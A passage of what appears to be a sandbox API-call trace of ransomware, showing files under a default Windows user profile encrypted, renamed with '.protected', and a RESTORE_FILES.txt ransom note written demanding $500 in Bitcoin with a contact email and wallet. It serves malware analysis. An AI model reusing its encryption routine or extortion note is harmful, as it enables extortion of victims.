lpOverlapped=0x0) returned 1 [0095.144] CloseHandle (hObject=0xa4) returned 1 [0095.144] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.144] lstrcmpiW (lpString1="Favorites", lpString2="Windows") returned -1 [0095.144] lstrcmpiW (lpString1="Favorites", lpString2="Program Files") returned -1 [0095.144] lstrcmpiW (lpString1="Favorites", lpString2="Program Files (x86)") returned -1 [0095.144] lstrcmpiW (lpString1="Favorites", lpString2="$Recycle.bin") returned 1 [0095.144] lstrcmpiW (lpString1="Favorites", lpString2="System Volume Information") returned -1 [0095.144] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites") returned 30 [0095.144] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0095.144] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0095.144] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\*") returned 32 [0095.144] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.146] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.146] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.146] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.146] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.146] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.146] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\.") returned 32 [0095.147] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.147] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.147] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.147] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.147] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\." (normalized: "c:\\users\\default\\favorites\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.147] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.147] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.147] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.147] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.147] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.147] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.147] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\..") returned 33 [0095.147] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.147] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.147] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.147] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.147] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.147] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\.." 
(normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.147] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.147] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.147] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.147] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.147] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.148] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.148] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0095.148] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.148] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.148] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.148] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.148] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0095.148] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.148] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0095.148] StrStrW 
(lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.148] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0095.148] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.148] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0095.149] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.149] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0095.149] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.150] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.150] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.150] CloseHandle (hObject=0xb4) returned 1 [0095.150] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.protected") returned 52 [0095.150] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.protected" (normalized: "c:\\users\\default\\favorites\\desktop.ini.protected")) returned 1 [0095.151] 
FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.151] lstrcmpiW (lpString1="Links", lpString2="Windows") returned -1 [0095.151] lstrcmpiW (lpString1="Links", lpString2="Program Files") returned -1 [0095.151] lstrcmpiW (lpString1="Links", lpString2="Program Files (x86)") returned -1 [0095.151] lstrcmpiW (lpString1="Links", lpString2="$Recycle.bin") returned 1 [0095.151] lstrcmpiW (lpString1="Links", lpString2="System Volume Information") returned -1 [0095.151] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links") returned 36 [0095.151] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0095.151] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0095.151] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*") returned 38 [0095.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0095.151] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.151] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.151] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.151] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.151] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.151] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\.") returned 38 [0095.151] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.151] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.151] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.151] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.151] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\." (normalized: "c:\\users\\default\\favorites\\links\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.152] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.152] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.152] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.152] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.152] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.152] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.152] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\..") returned 39 [0095.152] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.152] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.152] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.152] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.152] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.152] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\.." 
(normalized: "c:\\users\\default\\favorites"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.152] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.152] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.152] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.152] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.152] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.152] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.152] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0095.152] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.152] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.152] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.152] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.153] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0095.153] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.153] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") 
returned 48 [0095.153] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.153] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0095.153] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.153] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x50, lpOverlapped=0x0) returned 1 [0095.154] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.154] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x50, lpOverlapped=0x0) returned 1 [0095.154] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.154] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.154] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.154] CloseHandle (hObject=0xd4) returned 1 [0095.155] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini.protected") returned 58 [0095.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini.protected" (normalized: 
"c:\\users\\default\\favorites\\links\\desktop.ini.protected")) returned 1 [0095.156] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.156] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Windows") returned -1 [0095.156] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Program Files") returned 1 [0095.156] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Program Files (x86)") returned 1 [0095.156] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="$Recycle.bin") returned 1 [0095.156] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="System Volume Information") returned 1 [0095.156] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0095.156] StrStrIW (lpFirst="Web Slice Gallery.url", lpSrch=".protected") returned 0x0 [0095.156] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2="RESTORE_FILES.txt") returned 1 [0095.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.156] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0095.156] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".txt") returned 0x0 [0095.156] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 
58 [0095.156] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".rar") returned 0x0 [0095.156] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0095.156] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".zip") returned 0x0 [0095.156] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xe2, lpOverlapped=0x0) returned 1 [0095.157] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.157] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xe2, lpOverlapped=0x0) returned 1 [0095.158] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.158] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.158] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.158] CloseHandle (hObject=0xd4) returned 1 [0095.159] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.protected") returned 68 [0095.159] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web 
Slice Gallery.url.protected" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.protected")) returned 1 [0095.160] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0095.160] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0095.160] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\RESTORE_FILES.txt") returned 54 [0095.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\favorites\\links\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.172] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.172] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0095.173] lstrlenA (lpString="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") returned 684 [0095.173] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0095.173] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.173] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.173] CloseHandle (hObject=0xb4) returned 1 [0095.174] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.174] lstrcmpiW (lpString1="Microsoft Websites", lpString2="Windows") returned -1 [0095.174] lstrcmpiW (lpString1="Microsoft Websites", lpString2="Program Files") returned -1 [0095.174] lstrcmpiW (lpString1="Microsoft Websites", lpString2="Program Files (x86)") returned -1 [0095.174] lstrcmpiW (lpString1="Microsoft Websites", lpString2="$Recycle.bin") returned 1 [0095.174] lstrcmpiW (lpString1="Microsoft Websites", lpString2="System Volume Information") returned -1 [0095.174] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites") returned 49 [0095.174] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0095.174] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0095.174] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*") returned 51 [0095.174] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0095.181] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.181] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.181] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.181] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.181] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\.") returned 51 [0095.181] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.181] FindNextFileW (in: 
hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.181] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.181] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.181] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.181] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.181] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\..") returned 52 [0095.181] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.181] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.181] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.181] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Windows") returned -1 [0095.181] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Program Files") returned -1 [0095.181] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Program Files (x86)") returned -1 [0095.181] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="$Recycle.bin") returned 1 [0095.181] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="System Volume Information") returned -1 [0095.182] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0095.182] StrStrIW (lpFirst="IE Add-on site.url", lpSrch=".protected") returned 0x0 [0095.182] lstrcmpW (lpString1="IE Add-on site.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.182] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: 